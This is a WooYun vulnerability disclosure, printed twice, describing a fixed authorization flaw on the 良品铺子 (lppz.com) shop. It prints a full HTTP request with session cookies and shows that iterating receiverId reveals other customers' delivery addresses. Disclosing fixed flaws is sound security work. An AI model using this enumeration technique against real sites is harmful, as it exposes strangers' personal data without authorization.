当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115355

漏洞标题:良品铺子某处越权

相关厂商:良品铺子

漏洞作者: 路人甲

提交时间:2015-05-21 19:06

修复时间:2015-05-25 17:17

公开时间:2015-05-25 17:17

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-05-25: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

良品铺子某处越权

详细说明:

从上次的订单遍历来看,越权应该挺多的
先找找看是否是大小厂商和rank,再决定找不找漏洞了
这次是下单时候的收货地址的信息泄露,存在越权
可以看到其他用户的收货地址

POST /member/order/setDefault_receiver.jhtml HTTP/1.1
Host: www.lppz.com
Proxy-Connection: keep-alive
Content-Length: 15
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.lppz.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.5.1000 Chrome/30.0.1599.101 Safari/537.36
token: 97f9a7af-40ac-46cf-9642-a53dcf17ded4
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://www.lppz.com/member/order/info.jhtml?allSelect=Y&cartItems=29162,29163
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Cookie: route=d56e7065d3254c70482a3ded30899656; token=97f9a7af-40ac-46cf-9642-a53dcf17ded4; LPPZ_SESSION_ID=399D31D955BF010BD775C3350F728264; JSESSIONID=BDFC9DB7FA5265D272A3FD1C77DFC812; CASTGC=TGT-1467-xLruQixPGsdMoieCacZQnWStYtABsblcfitAtnVVxsLzCSHXUT-www.lppz.com; username=test1234; Hm_lvt_7cefb8e3a7c5228e2810c2d7556c4653=1432188653; Hm_lpvt_7cefb8e3a7c5228e2810c2d7556c4653=1432195654; nTalk_CACHE_DATA={uid:kf_9893_ISME9754_guestEF8172EA-37D3-72,tid:1432188655017824}; NTKF_T2D_CLIENTID=guestEF8172EA-37D3-7288-46F3-75189AE2337F
receiverId=2100


下单的时候,选择收货地址
是个receiverId
遍历这个值,可以看到其他人的地址

11.jpg


11.jpg

漏洞证明:

从上次的订单遍历来看,越权应该挺多的
先找找看是否是大小厂商和rank,再决定找不找漏洞了
这次是下单时候的收货地址的信息泄露,存在越权
可以看到其他用户的收货地址

POST /member/order/setDefault_receiver.jhtml HTTP/1.1
Host: www.lppz.com
Proxy-Connection: keep-alive
Content-Length: 15
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.lppz.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.5.1000 Chrome/30.0.1599.101 Safari/537.36
token: 97f9a7af-40ac-46cf-9642-a53dcf17ded4
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://www.lppz.com/member/order/info.jhtml?allSelect=Y&cartItems=29162,29163
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Cookie: route=d56e7065d3254c70482a3ded30899656; token=97f9a7af-40ac-46cf-9642-a53dcf17ded4; LPPZ_SESSION_ID=399D31D955BF010BD775C3350F728264; JSESSIONID=BDFC9DB7FA5265D272A3FD1C77DFC812; CASTGC=TGT-1467-xLruQixPGsdMoieCacZQnWStYtABsblcfitAtnVVxsLzCSHXUT-www.lppz.com; username=test1234; Hm_lvt_7cefb8e3a7c5228e2810c2d7556c4653=1432188653; Hm_lpvt_7cefb8e3a7c5228e2810c2d7556c4653=1432195654; nTalk_CACHE_DATA={uid:kf_9893_ISME9754_guestEF8172EA-37D3-72,tid:1432188655017824}; NTKF_T2D_CLIENTID=guestEF8172EA-37D3-7288-46F3-75189AE2337F
receiverId=2100


下单的时候,选择收货地址
是个receiverId
遍历这个值,可以看到其他人的地址

11.jpg


11.jpg

修复方案:

验证权限

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-22 09:28

厂商回复:

多谢来搞。。。

最新状态:

2015-05-25:已修复


漏洞评价:

评论

  1. 2015-05-25 22:22 | only_admin ( 路人 | Rank:11 漏洞数:5 | ~~~~我只是个孩子╭(°A°`)╮~~~~)

    多谢来搞。。。

  2. 2015-05-30 23:37 | 稀饭粥 ( 路人 | Rank:8 漏洞数:1 | WSNhacking)

    学习

  3. 2015-06-01 10:53 | 开心一下1313 ( 实习白帽子 | Rank:63 漏洞数:20 | 喝口水,压压惊......)

    喜欢被搞